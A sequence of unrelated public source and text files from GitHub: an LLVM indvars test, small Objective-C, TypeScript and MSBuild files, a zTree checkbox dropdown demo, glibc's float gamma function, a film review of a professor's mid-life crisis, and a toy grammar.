br i1 %cmp1, label %for.body.lr.ph, label %for.end
for.body.lr.ph: ; preds = %entry
br label %for.body
for.body: ; preds = %for.body.lr.ph, %for.inc
%i.02 = phi i32 [ 0, %for.body.lr.ph ], [ %inc, %for.inc ]
%idxprom = zext i32 %i.02 to i64
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* @a, i64 0, i64 %idxprom
%0 = load i32, i32* %arrayidx, align 4
%idxprom1 = sext i32 %i.02 to i64
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* @b, i64 0, i64 %idxprom1
%1 = load i32, i32* %arrayidx2, align 4
%add = add nsw i32 %0, %1
%add3 = add nsw i32 %i.02, %M
%idxprom4 = sext i32 %add3 to i64
%arrayidx5 = getelementptr inbounds [100 x i32], [100 x i32]* @a, i64 0, i64 %idxprom4
store i32 %add, i32* %arrayidx5, align 4
br label %for.inc
for.inc: ; preds = %for.body
%inc = add nsw i32 %i.02, 1
%cmp = icmp slt i32 %inc, %M
br i1 %cmp, label %for.body, label %for.cond.for.end_crit_edge
for.cond.for.end_crit_edge: ; preds = %for.inc
br label %for.end
for.end: ; preds = %for.cond.for.end_crit_edge, %entry
%call = call i32 @dummy(i32* getelementptr inbounds ([100 x i32], [100 x i32]* @a, i32 0, i32 0), i32* getelementptr inbounds ([100 x i32], [100 x i32]* @b, i32 0, i32 0))
ret i32 0
}
declare i32 @dummy(i32*, i32*)
; A case where zext should not be eliminated when its operands could only be extended by sext.
define i32 @foo3(i32 %M) {
; CHECK-LABEL: @foo3(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[CMP1:%.*]] = icmp slt i32 0, [[M:%.*]]
; CHECK-NEXT: br i1 [[CMP1]], label [[FOR_BODY_LR_PH:%.*]], label [[FOR_END:%.*]]
; CHECK: for.body.lr.ph:
; CHECK-NEXT: [[TMP0:%.*]] = sext i32 [[M]] to i64
; CHECK-NEXT: [[WIDE_TRIP_COUNT:%.*]] = zext i32 [[M]] to i64
; CHECK-NEXT: br label [[FOR_BODY:%.*]]
; CHECK: for.body:
; CHECK-NEXT: [[INDVARS_IV:%.*]] = phi i64 [ [[INDVARS_IV_NEXT:%.*]], [[FOR_INC:%.*]] ], [ 0, [[FOR_BODY_LR_PH]] ]
; CHECK-NEXT: [[ARRAYIDX:%.*]] = getelementptr inbounds [100 x i32], [100 x i32]* @a, i64 0, i64 [[INDVARS_IV]]
; CHECK-NEXT: [[TMP1:%.*]] = load i32, i32* [[ARRAYIDX]], align 4
; CHECK-NEXT: [[ARRAYIDX2:%.*]] = getelementptr inbounds [100 x i32], [100 x i32]* @b, i64 0, i64 [[INDVARS_IV]]
; CHECK-NEXT: [[TMP2:%.*]] = load i32, i32* [[ARRAYIDX2]], align 4
; CHECK-NEXT: [[ADD:%.*]] = add nsw i32 [[TMP1]], [[TMP2]]
; CHECK-NEXT: [[TMP3:%.*]] = add nsw i64 [[INDVARS_IV]], [[TMP0]]
; CHECK-NEXT: [[TMP4:%.*]] = trunc i64 [[TMP3]] to i32
; CHECK-NEXT: [[IDXPROM4:%.*]] = zext i32 [[TMP4]] to i64
; CHECK-NEXT: [[ARRAYIDX5:%.*]] = getelementptr inbounds [100 x i32], [100 x i32]* @a, i64 0, i64 [[IDXPROM4]]
; CHECK-NEXT: store i32 [[ADD]], i32* [[ARRAYIDX5]], align 4
; CHECK-NEXT: br label [[FOR_INC]]
; CHECK: for.inc:
; CHECK-NEXT: [[INDVARS_IV_NEXT]] = add nuw nsw i64 [[INDVARS_IV]], 1
; CHECK-NEXT: [[EXITCOND:%.*]] = icmp ne i64 [[INDVARS_IV_NEXT]], [[WIDE_TRIP_COUNT]]
; CHECK-NEXT: br i1 [[EXITCOND]], label [[FOR_BODY]], label [[FOR_COND_FOR_END_CRIT_EDGE:%.*]]
; CHECK: for.cond.for.end_crit_edge:
; CHECK-NEXT: br label [[FOR_END]]
; CHECK: for.end:
; CHECK-NEXT: [[CALL:%.*]] = call i32 @dummy(i32* getelementptr inbounds ([100 x i32], [100 x i32]* @a, i32 0, i32 0), i32* getelementptr inbounds ([100 x i32], [100 x i32]* @b, i32 0, i32 0))
; CHECK-NEXT: ret i32 0
;
entry:
%cmp1 = icmp slt i32 0, %M
br i1 %cmp1, label %for.body.lr.ph, label %for.end
for.body.lr.ph: ; preds = %entry
br label %for.body
for.body: ; preds = %for.body.lr.ph, %for.inc
%i.02 = phi i32 [ 0, %for.body.lr.ph ], [ %inc, %for.inc ]
%idxprom = sext i32 %i.02 to i64
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* @a, i64 0, i64 %idxprom
%0 = load i32, i32* %arrayidx, align 4
%idxprom1 = sext i32 %i.02 to i64
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* @b, i64 0, i64 %idxprom1
%1 = load i32, i32* %arrayidx2, align 4
%add = add nsw i32 %0, %1
%add3 = add nsw i32 %i.02, %M
%idxprom4 = zext i32 %add3 to i64
%arrayidx5 = getelementptr inbounds [100 x i32], [100 x i32]* @a, i64 0, i64 %idxprom4
store i32 %add, i32* %arrayidx5, align 4
br label %for.inc
for.inc: ; preds = %for.body
%inc = add nsw i32 %i.02, 1
%cmp = icmp slt i32 %inc, %M
br i1 %cmp, label %for.body, label %for.cond.for.end_crit_edge
for.cond.for.end_crit_edge: ; preds = %for.inc
br label %for.end
for.end: ; preds = %for.cond.for.end_crit_edge, %entry
%call = call i32 @dummy(i32* getelementptr inbounds ([100 x i32], [100 x i32]* @a, i32 0, i32 0), i32* getelementptr inbounds ([100 x i32], [100 x i32]* @b, i32 0, i32 0))
ret i32 0
}
%struct.image = type {i32, i32}
define i32 @foo4(%struct.image* %input, i32 %length, i32* %in) {
; CHECK-LABEL: @foo4(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[STRIDE:%.*]] = getelementptr inbounds [[STRUCT_IMAGE:%.*]], %struct.image* [[INPUT:%.*]], i64 0, i32 1
; CHECK-NEXT: [[TMP0:%.*]] = load i32, i32* [[STRIDE]], align 4
; CHECK-NEXT: [[CMP17:%.*]] = icmp sgt i32 [[LENGTH:%.*]], 1
; CHECK-NEXT: br i1 [[CMP17]], label [[FOR_BODY_LR_PH:%.*]], label [[FOR_COND_CLEANUP:%.*]]
; CHECK: for.body.lr.ph:
; CHECK-NEXT: [[CHANNEL:%.*]] = getelementptr inbounds [[STRUCT_IMAGE]], %struct.image* [[INPUT]], i64 0, i32 0
; CHECK-NEXT: [[TMP1:%.*]] = sext i32 [[TMP0]] to i64
; CHECK-NEXT: [[WIDE_TRIP_COUNT:%.*]] = zext i32 [[LENGTH]] to i64
; CHECK-NEXT: br label [[FOR_BODY:%.*]]
; CHECK: for.cond.cleanup.loopexit:
; CHECK-NEXT: [[TMP2:%.*]] = phi i32 [ [[TMP10:%.*]], [[FOR_BODY]] ]
; CHECK-NEXT: br label [[FOR_COND_CLEANUP]]
; CHECK: for.cond.cleanup:
; CHECK-NEXT: [[TMP3:%.*]] = phi i32 [ 0, [[ENTRY:%.*]] ], [ [[TMP2]], [[FOR_COND_CLEANUP_LOOPEXIT:%.*]] ]
; CHECK-NEXT: ret i32 [[TMP3]]
; CHECK: for.body:
; CHECK-NEXT: [[INDVARS_IV:%.*]] = phi i64 [ [[INDVARS_IV_NEXT:%.*]], [[FOR_BODY]] ], [ 1, [[FOR_BODY_LR_PH]] ]
; CHECK-NEXT: [[INDVARS_IV_NEXT]] = add nuw nsw i64 [[INDVARS_IV]], 1
; CHECK-NEXT: [[TMP4:%.*]] = load i32, i32* [[CHANNEL]], align 8
; CHECK-NEXT: [[TMP5:%.*]] = sext i32 [[TMP4]] to i64
; CHECK-NEXT: [[TMP6:%.*]] = mul nsw i64 [[TMP5]], [[INDVARS_IV_NEXT]]
; CHECK-NEXT: [[ADD_PTR:%.*]] = getelementptr inbounds i32, i32* [[IN:%.*]], i64 [[TMP6]]
; CHECK-NEXT: [[TMP7:%.*]] = load i32, i32* [[ADD_PTR]], align 4
; CHECK-NEXT: [[TMP8:%.*]] = mul nsw i64 [[TMP1]], [[INDVARS_IV_NEXT]]
; CHECK-NEXT: [[ADD_PTR1:%.*]] = getelementptr inbounds i32, i32* [[IN]], i64 [[TMP8]]
; CHECK-NEXT: [[TMP9:%.*]] = load i32, i32* [[ADD_PTR1]], align 4
; CHECK-NEXT: [[TMP10]] = add i32 [[TMP7]], [[TMP9]]
; CHECK-NEXT: [[EXITCOND:%.*]] = icmp ne i64 [[INDVARS_IV_NEXT]], [[WIDE_TRIP_COUNT]]
; CHECK-NEXT: br i1 [[EXITCOND]], label [[FOR_BODY]], label [[FOR_COND_CLEANUP_LOOPEXIT]]
;
entry:
%stride = getelementptr inbounds %struct.image, %struct.image* %input, i64 0, i32 1
%0 = load i32, i32* %stride, align 4
%cmp17 = icmp sgt i32 %length, 1
br i1 %cmp17, label %for.body.lr.ph, label %for.cond.cleanup
for.body.lr.ph: ; preds = %entry
%channel = getelementptr inbounds %struct.image, %struct.image* %input, i64 0, i32 0
br label %for.body
for.cond.cleanup.loopexit: ; preds = %for.body
%1 = phi i32 [ %6, %for.body ]
br label %for.cond.cleanup
for.cond.cleanup: ; preds = %for.cond.cleanup.loopexit, %entry
%2 = phi i32 [ 0, %entry ], [ %1, %for.cond.cleanup.loopexit ]
ret i32 %2
; The mul instruction below is widened instead of generating a truncate instruction for it,
; regardless of whether the load operand of the mul is inside or outside the loop (we have both cases).
for.body: ; preds = %for.body.lr.ph, %for.body
%x.018 = phi i32 [ 1, %for.body.lr.ph ], [ %add, %for.body ]
%add = add nuw nsw i32 %x.018, 1
%3 = load i32, i32* %channel, align 8
%mul = mul nsw i32 %3, %add
%idx.ext = sext i32 %mul to i64
%add.ptr = getelementptr inbounds i32, i32* %in, i64 %idx.ext
%4 = load i32, i32* %add.ptr, align 4
%mul1 = mul nsw i32 %0, %add
%idx.ext1 = sext i32 %mul1 to i64
%add.ptr1 = getelementptr inbounds i32, i32* %in, i64 %idx.ext1
%5 = load i32, i32* %add.ptr1, align 4
%6 = add i32 %4, %5
%cmp = icmp slt i32 %add, %length
br i1 %cmp, label %for.body, label %for.cond.cleanup.loopexit
}
define i32 @foo5(%struct.image* %input, i32 %length, i32* %in) {
; CHECK-LABEL: @foo5(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[STRIDE:%.*]] = getelementptr inbounds [[STRUCT_IMAGE:%.*]], %struct.image* [[INPUT:%.*]], i64 0, i32 1
; CHECK-NEXT: [[TMP0:%.*]] = load i32, i32* [[STRIDE]], align 4
; CHECK-NEXT: [[CMP17:%.*]] = icmp sgt i32 [[LENGTH:%.*]], 1
; CHECK-NEXT: br i1 [[CMP17]], label [[FOR_BODY_LR_PH:%.*]], label [[FOR_COND_CLEANUP:%.*]]
; CHECK: for.body.lr.ph:
; CHECK-NEXT: [[CHANNEL:%.*]] = getelementptr inbounds [[STRUCT_IMAGE]], %struct.image* [[INPUT]], i64 0, i32 0
; CHECK-NEXT: [[TMP1:%.*]] = sext i32 [[TMP0]] to i64
; CHECK-NEXT: [[WIDE_TRIP_COUNT:%.*]] = zext i32 [[LENGTH]] to i64
; CHECK-NEXT: br label [[FOR_BODY:%.*]]
; CHECK: for.cond.cleanup.loopexit:
; CHECK-NEXT: [[TMP2:%.*]] = phi i32 [ [[TMP10:%.*]], [[FOR_BODY]] ]
; CHECK-NEXT: br label [[FOR_COND_CLEANUP]]
; CHECK: for.cond.cleanup:
; CHECK-NEXT: [[TMP3:%.*]] = phi i32 [ 0, [[ENTRY:%.*]] ], [ [[TMP2]], [[FOR_COND_CLEANUP_LOOPEXIT:%.*]] ]
; CHECK-NEXT: ret i32 [[TMP3]]
; CHECK: for.body:
; CHECK-NEXT: [[INDVARS_IV:%.*]] = phi i64 [ [[INDVARS_IV_NEXT:%.*]], [[FOR_BODY]] ], [ 1, [[FOR_BODY_LR_PH]] ]
; CHECK-NEXT: [[INDVARS_IV_NEXT]] = add nuw nsw i64 [[INDVARS_IV]], 1
; CHECK-NEXT: [[TMP4:%.*]] = load i32, i32* [[CHANNEL]], align 8
; CHECK-NEXT: [[TMP5:%.*]] = trunc i64 [[INDVARS_IV_NEXT]] to i32
; CHECK-NEXT: [[MUL:%.*]] = mul nsw i32 [[TMP4]], [[TMP5]]
; CHECK-NEXT: [[IDX_EXT:%.*]] = sext i32 [[MUL]] to i64
; CHECK-NEXT: [[ADD_PTR:%.*]] = getelementptr inbounds i32, i32* [[IN:%.*]], i64 [[IDX_EXT]]
; CHECK-NEXT: [[TMP6:%.*]] = load i32, i32* [[ADD_PTR]], align 4
; CHECK-NEXT: [[TMP7:%.*]] = mul nsw i64 [[TMP1]], [[INDVARS_IV_NEXT]]
; CHECK-NEXT: [[ADD_PTR1:%.*]] = getelementptr inbounds i32, i32* [[IN]], i64 [[TMP7]]
; CHECK-NEXT: [[TMP8:%.*]] = load i32, i32* [[ADD_PTR1]], align 4
; CHECK-NEXT: [[TMP9:%.*]] = add i32 [[TMP6]], [[TMP8]]
; CHECK-NEXT: [[TMP10]] = add i32 [[TMP9]], [[MUL]]
; CHECK-NEXT: [[EXITCOND:%.*]] = icmp ne i64 [[INDVARS_IV_NEXT]], [[WIDE_TRIP_COUNT]]
; CHECK-NEXT: br i1 [[EXITCOND]], label [[FOR_BODY]], label [[FOR_COND_CLEANUP_LOOPEXIT]]
;
entry:
%stride = getelementptr inbounds %struct.image, %struct.image* %input, i64 0, i32 1
%0 = load i32, i32* %stride, align 4
%cmp17 = icmp sgt i32 %length, 1
br i1 %cmp17, label %for.body.lr.ph, label %for.cond.cleanup
for.body.lr.ph: ; preds = %entry
%channel = getelementptr inbounds %struct.image, %struct.image* %input, i64 0, i32 0
br label %for.body
for.cond.cleanup.loopexit: ; preds = %for.body
%1 = phi i32 [ %7, %for.body ]
br label %for.cond.cleanup
for.cond.cleanup: ; preds = %for.cond.cleanup.loopexit, %entry
%2 = phi i32 [ 0, %entry ], [ %1, %for.cond.cleanup.loopexit ]
ret i32 %2
; This example is the same as above except that the first mul is used in two places
; and this may result in having two versions of the multiply: an i32 and i64 version.
; In this case, keep the truncate instructions to avoid this redundancy.
for.body: ; preds = %for.body.lr.ph, %for.body
%x.018 = phi i32 [ 1, %for.body.lr.ph ], [ %add, %for.body ]
%add = add nuw nsw i32 %x.018, 1
%3 = load i32, i32* %channel, align 8
%mul = mul nsw i32 %3, %add
%idx.ext = sext i32 %mul to i64
%add.ptr = getelementptr inbounds i32, i32* %in, i64 %idx.ext
%4 = load i32, i32* %add.ptr, align 4
%mul1 = mul nsw i32 %0, %add
%idx.ext1 = sext i32 %mul1 to i64
%add.ptr1 = getelementptr inbounds i32, i32* %in, i64 %idx.ext1
%5 = load i32, i32* %add.ptr1, align 4
%6 = add i32 %4, %5
%7 = add i32 %6, %mul
%cmp = icmp slt i32 %add, %length
br i1 %cmp, label %for.body, label %for.cond.cleanup.loopexit
}
| {
"pile_set_name": "Github"
} |
//
// MediaCaptureTestAppViewController.h
// MediaCaptureTestApp
//
// Created by Prasad Malekudiyi Balakrishn on 2/9/12.
// Copyright __MyCompanyName__ 2012. All rights reserved.
//
#import <UIKit/UIKit.h>
@interface MediaCaptureTestAppViewController : UIViewController {
}
@end
| {
"pile_set_name": "Github"
} |
export interface IKeyPair {
account: string;
region: string;
keyName: string;
keyFingerprint: string;
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Sources">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Headers">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\..\..\gettext-tools\src\msgcomm.c"><Filter>Sources</Filter></ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="..\..\..\windows\gettext.rc"><Filter>Resource Files</Filter></ResourceCompile>
</ItemGroup>
</Project>
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<HTML>
<HEAD>
<TITLE>ZTREE DEMO - checkbox select menu</TITLE>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="../../../css/demo.css" type="text/css">
<link rel="stylesheet" href="../../../css/zTreeStyle/zTreeStyle.css"
type="text/css">
<script type="text/javascript" src="../../../js/jquery-1.4.4.min.js"></script>
<script type="text/javascript"
src="../../../js/jquery.ztree.core-3.5.js"></script>
<script type="text/javascript"
src="../../../js/jquery.ztree.excheck-3.5.js"></script>
<!-- <script type="text/javascript" src="../../../js/jquery.ztree.exedit-3.5.js"></script>-->
<SCRIPT type="text/javascript">
<!--
var setting = {
check: {
enable: true,
chkboxType: {"Y":"", "N":""}
},
view: {
dblClickExpand: false
},
data: {
simpleData: {
enable: true
}
},
callback: {
beforeClick: beforeClick,
onCheck: onCheck
}
};
var zNodes =[
{id:1, pId:0, name:"北京"},
{id:2, pId:0, name:"天津"},
{id:3, pId:0, name:"上海"},
{id:6, pId:0, name:"重庆"},
{id:4, pId:0, name:"河北省", open:true, nocheck:true},
{id:41, pId:4, name:"石家庄"},
{id:42, pId:4, name:"保定"},
{id:43, pId:4, name:"邯郸"},
{id:44, pId:4, name:"承德"},
{id:5, pId:0, name:"广东省", open:true, nocheck:true},
{id:51, pId:5, name:"广州"},
{id:52, pId:5, name:"深圳"},
{id:53, pId:5, name:"东莞"},
{id:54, pId:5, name:"佛山"},
{id:6, pId:0, name:"福建省", open:true, nocheck:true},
{id:61, pId:6, name:"福州"},
{id:62, pId:6, name:"厦门"},
{id:63, pId:6, name:"泉州"},
{id:64, pId:6, name:"三明"}
];
function beforeClick(treeId, treeNode) {
var zTree = $.fn.zTree.getZTreeObj("treeDemo");
zTree.checkNode(treeNode, !treeNode.checked, null, true);
return false;
}
function onCheck(e, treeId, treeNode) {
var zTree = $.fn.zTree.getZTreeObj("treeDemo"),
nodes = zTree.getCheckedNodes(true),
v = "";
for (var i=0, l=nodes.length; i<l; i++) {
v += nodes[i].name + ",";
}
if (v.length > 0 ) v = v.substring(0, v.length-1);
var cityObj = $("#citySel");
cityObj.attr("value", v);
}
function showMenu() {
var cityObj = $("#citySel");
var cityOffset = $("#citySel").offset();
$("#menuContent").css({left:cityOffset.left + "px", top:cityOffset.top + cityObj.outerHeight() + "px"}).slideDown("fast");
$("body").bind("mousedown", onBodyDown);
}
function hideMenu() {
$("#menuContent").fadeOut("fast");
$("body").unbind("mousedown", onBodyDown);
}
function onBodyDown(event) {
if (!(event.target.id == "menuBtn" || event.target.id == "citySel" || event.target.id == "menuContent" || $(event.target).parents("#menuContent").length>0)) {
hideMenu();
}
}
$(document).ready(function(){
$.fn.zTree.init($("#treeDemo"), setting, zNodes);
});
//-->
</SCRIPT>
<style type="text/css">
</style>
</HEAD>
<BODY>
<h1>Multi-select dropdown menu with checkbox -- zTree</h1>
<h6>[ 文件路径: super/select_menu_checkbox.html ]</h6>
<div class="content_wrap">
<div class="zTreeDemoBackground left">
<ul class="list">
<li class="title"> <span class="highlight_red">勾选
checkbox 或者 点击节点 进行选择</span></li>
<li class="title"> Test: <input id="citySel"
type="text" readonly value="" style="width: 120px;"
onclick="showMenu();" /> <a id="menuBtn" href="#"
onclick="showMenu(); return false;">select</a></li>
</ul>
</div>
<div class="right">
<ul class="info">
<li class="title"><h2>实现方法说明</h2>
<ul class="list">
						<li>A multi-select dropdown menu can also be implemented easily with checkbox</li>
						<li>This demo is mainly used for comparison with the other dropdown menu demos</li>
</ul></li>
</ul>
</div>
</div>
<div id="menuContent" class="menuContent"
style="display: none; position: absolute;">
<ul id="treeDemo" class="ztree"
style="margin-top: 0; width: 180px; height: 300px;"></ul>
</div>
</BODY>
</HTML> | {
"pile_set_name": "Github"
} |
47 01 60 00 bd 03 27 21 24 00 0a 00 00 00 00 00
47 00 60 00 bd 03 60 20 40 00 00 00 00 00 00 00
47 00 80 00 bd 03 60 20 40 00 00 00 00 00 00 00
| {
"pile_set_name": "Github"
} |
for many people , procrastination isn't a problem to overcome , it's a high art .
we'll do just about anything to put off a task .
when the deadline for this column nears , it's the only time during the week dishes get washed and the bed made and laundry done and plants watered and . . .
eventually , hopefully , sometimes , there's a breakthrough and we actually get down to work .
amazingly it's almost always easier than we dreaded and after finishing , that sense of oppressive apprehension melts away .
and then , the next time , we do it all again .
english professor grady tripp ( michael douglas ) is a master .
seven years ago , his first book was a hit .
he's been working on his second -- a short 200-page piece -- since then .
fearful that he can't live up to the first , he can't bring himself to finish it .
no writer's block , he's nearing 3 , 000 pages with no end in sight .
now he's having a particularly difficult day .
the college's annual writers conference is bringing in accomplished novelists reminding tripp that other people are finishing _their_ books .
during the first day , his wife has left him , his married girlfriend informs him she's pregnant and his agent is in town with a six-foot transvestite in tow .
by the evening , our besieged writer is driving though the snow-covered streets of pittsburgh with a suicidal student beside him , a stolen jacket that marilyn monroe wore on her wedding day in the back seat and a murdered blind dog stuffed in the trunk .
this could be a pivotal point in his mid-life crisis .
and then there's the next morning .
there's a lot to like about this movie .
there are no huge explosions , shattering glass or computer-generated dinosaurs to distract from the very real human issues .
grady is caught up in the curse of people who accomplish great things early in their career .
in the world of " what have you done for me lately ? " , he knows his second book has to be better than his first .
instead of finding out , he drifts , comfortable in the insular cocoon of academic peter panhood .
he doesn't have much of a life and neither does his star pupil james leer ( tobey maguire ) .
james may be suicidal and psychotic .
certainly everything that comes out of his mouth is a lie .
he makes up a past of working class anguish because the truth of wealth and comfort just isn't interesting enough .
as the weekend progresses , they are both forced to fully engage life .
that's the question they must face : comfort or real experiences ?
the film takes some interesting chances .
non-traditional relationships are presented as matter-of-fact .
extra-marital , gay , interracial , professor-student : here they aren't judged , merely choices .
the actors are all first-rate .
douglas triumphs , playing against type as he spends most of his time disheveled , unshaven and clad in a pink women's house robe .
maguire's disengaged alienation works perfectly here .
robert downey jr . as grady's agent livens up his scenes .
director curtis hanson ( " l . a .
confidential " ) makes a few missteps .
the women are underused .
frances mcdormand does a good job of her limited role of sara , grady's married lover but we never understand much of who she is .
the chemistry between the two of them is non-existent which makes some of the ending unconvincing .
katie holmes is a student with a major crush on the professor , but her character goes nowhere .
we never even see grady's exiting wife .
this is very much a guy's film .
the varied relationships between the men are much more convincing than any of the others .
grady's alternating mentoring and rejection of james is the centerpoint of the film , not him and sara .
as the boomers age , expect to see more mid-life crisis films to catch the attention of that demographic .
eventually it'll probably become cliche , but right now we've got a winner .
i'll finish this in a second .
right now i have to grab some paint .
i noticed some trim in the other room that needs a little touch-up .
( michael redman has written this column for so long that he's made mid-life crisis a career choice . )
| {
"pile_set_name": "Github"
} |
{
"description": "Demo of Google GeoChart",
"main": "index.js",
"dependencies": {
"react": "^16",
"react-dom": "^16",
"react-google-charts": ">2.0.0"
}
}
| {
"pile_set_name": "Github"
} |
/* Implementation of gamma function according to ISO C.
Copyright (C) 1997-2018 Free Software Foundation, Inc.
This file is part of the GNU C Library.
Contributed by Ulrich Drepper <[email protected]>, 1997.
The GNU C Library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
The GNU C Library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with the GNU C Library; if not, see
<http://www.gnu.org/licenses/>. */
#include <math.h>
#include <math-narrow-eval.h>
#include <math_private.h>
#include <math-underflow.h>
#include <float.h>
/* Coefficients B_2k / 2k(2k-1) of x^-(2k-1) inside exp in Stirling's
approximation to gamma function. */
static const float gamma_coeff[] =
{
0x1.555556p-4f,
-0xb.60b61p-12f,
0x3.403404p-12f,
};
#define NCOEFF (sizeof (gamma_coeff) / sizeof (gamma_coeff[0]))
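/* In full, the Stirling series used here is
     lgamma (x) ~= (x - 0.5) * log (x) - x + 0.5 * log (2 * pi)
                   + B_2/(2*1*x) + B_4/(4*3*x^3) + B_6/(6*5*x^5) + ...,
   so the three coefficients above are 1/12, -1/360 and 1/1260.  */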
/* Return gamma (X), for positive X less than 42, in the form R *
2^(*EXP2_ADJ), where R is the return value and *EXP2_ADJ is set to
avoid overflow or underflow in intermediate calculations. */
static float
gammaf_positive (float x, int *exp2_adj)
{
int local_signgam;
if (x < 0.5f)
{
*exp2_adj = 0;
return __ieee754_expf (__ieee754_lgammaf_r (x + 1, &local_signgam)) / x;
}
else if (x <= 1.5f)
{
*exp2_adj = 0;
return __ieee754_expf (__ieee754_lgammaf_r (x, &local_signgam));
}
else if (x < 2.5f)
{
*exp2_adj = 0;
float x_adj = x - 1;
return (__ieee754_expf (__ieee754_lgammaf_r (x_adj, &local_signgam))
* x_adj);
}
else
{
float eps = 0;
float x_eps = 0;
float x_adj = x;
float prod = 1;
if (x < 4.0f)
{
/* Adjust into the range for applying Stirling's
approximation. */
float n = __ceilf (4.0f - x);
x_adj = math_narrow_eval (x + n);
x_eps = (x - (x_adj - n));
prod = __gamma_productf (x_adj - n, x_eps, n, &eps);
}
/* The result is now gamma (X_ADJ + X_EPS) / (PROD * (1 + EPS)).
Compute gamma (X_ADJ + X_EPS) using Stirling's approximation,
starting by computing pow (X_ADJ, X_ADJ) with a power of 2
factored out. */
float exp_adj = -eps;
float x_adj_int = __roundf (x_adj);
float x_adj_frac = x_adj - x_adj_int;
int x_adj_log2;
float x_adj_mant = __frexpf (x_adj, &x_adj_log2);
if (x_adj_mant < (float) M_SQRT1_2)
{
x_adj_log2--;
x_adj_mant *= 2.0f;
}
*exp2_adj = x_adj_log2 * (int) x_adj_int;
float ret = (__ieee754_powf (x_adj_mant, x_adj)
* __ieee754_exp2f (x_adj_log2 * x_adj_frac)
* __ieee754_expf (-x_adj)
* sqrtf (2 * (float) M_PI / x_adj)
/ prod);
exp_adj += x_eps * __ieee754_logf (x_adj);
float bsum = gamma_coeff[NCOEFF - 1];
float x_adj2 = x_adj * x_adj;
for (size_t i = 1; i <= NCOEFF - 1; i++)
bsum = bsum / x_adj2 + gamma_coeff[NCOEFF - 1 - i];
exp_adj += bsum / x_adj;
return ret + ret * __expm1f (exp_adj);
}
}
float
__ieee754_gammaf_r (float x, int *signgamp)
{
int32_t hx;
float ret;
GET_FLOAT_WORD (hx, x);
if (__glibc_unlikely ((hx & 0x7fffffff) == 0))
{
/* Return value for x == 0 is Inf with divide by zero exception. */
*signgamp = 0;
return 1.0 / x;
}
if (__builtin_expect (hx < 0, 0)
&& (uint32_t) hx < 0xff800000 && __rintf (x) == x)
{
/* Return value for integer x < 0 is NaN with invalid exception. */
*signgamp = 0;
return (x - x) / (x - x);
}
if (__glibc_unlikely (hx == 0xff800000))
{
/* x == -Inf. According to ISO this is NaN. */
*signgamp = 0;
return x - x;
}
if (__glibc_unlikely ((hx & 0x7f800000) == 0x7f800000))
{
/* Positive infinity (return positive infinity) or NaN (return
NaN). */
*signgamp = 0;
return x + x;
}
if (x >= 36.0f)
{
/* Overflow. */
*signgamp = 0;
ret = math_narrow_eval (FLT_MAX * FLT_MAX);
return ret;
}
else
{
SET_RESTORE_ROUNDF (FE_TONEAREST);
if (x > 0.0f)
{
*signgamp = 0;
int exp2_adj;
float tret = gammaf_positive (x, &exp2_adj);
ret = __scalbnf (tret, exp2_adj);
}
else if (x >= -FLT_EPSILON / 4.0f)
{
*signgamp = 0;
ret = 1.0f / x;
}
else
{
float tx = __truncf (x);
*signgamp = (tx == 2.0f * __truncf (tx / 2.0f)) ? -1 : 1;
if (x <= -42.0f)
/* Underflow. */
ret = FLT_MIN * FLT_MIN;
else
{
float frac = tx - x;
if (frac > 0.5f)
frac = 1.0f - frac;
float sinpix = (frac <= 0.25f
? __sinf ((float) M_PI * frac)
: __cosf ((float) M_PI * (0.5f - frac)));
int exp2_adj;
float tret = (float) M_PI / (-x * sinpix
* gammaf_positive (-x, &exp2_adj));
ret = __scalbnf (tret, -exp2_adj);
math_check_force_underflow_nonneg (ret);
}
}
ret = math_narrow_eval (ret);
}
if (isinf (ret) && x != 0)
{
if (*signgamp < 0)
{
ret = math_narrow_eval (-__copysignf (FLT_MAX, ret) * FLT_MAX);
ret = -ret;
}
else
ret = math_narrow_eval (__copysignf (FLT_MAX, ret) * FLT_MAX);
return ret;
}
else if (ret == 0)
{
if (*signgamp < 0)
{
ret = math_narrow_eval (-__copysignf (FLT_MIN, ret) * FLT_MIN);
ret = -ret;
}
else
ret = math_narrow_eval (__copysignf (FLT_MIN, ret) * FLT_MIN);
return ret;
}
else
return ret;
}
strong_alias (__ieee754_gammaf_r, __gammaf_r_finite)
| {
"pile_set_name": "Github"
} |
S : ;
: "a" ;
: "a" "a" ;
: "a" A "b" ;
: "b" A "a" ;
A : "a" A "a" ;
: "b" A "b" ;
: "a" A "b" ;
: "b" A "a" ;
: ;
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]><html class="ie ie7" lang="en"> <![endif]-->
<!--[if IE 8 ]><html class="ie ie8" lang="en"> <![endif]-->
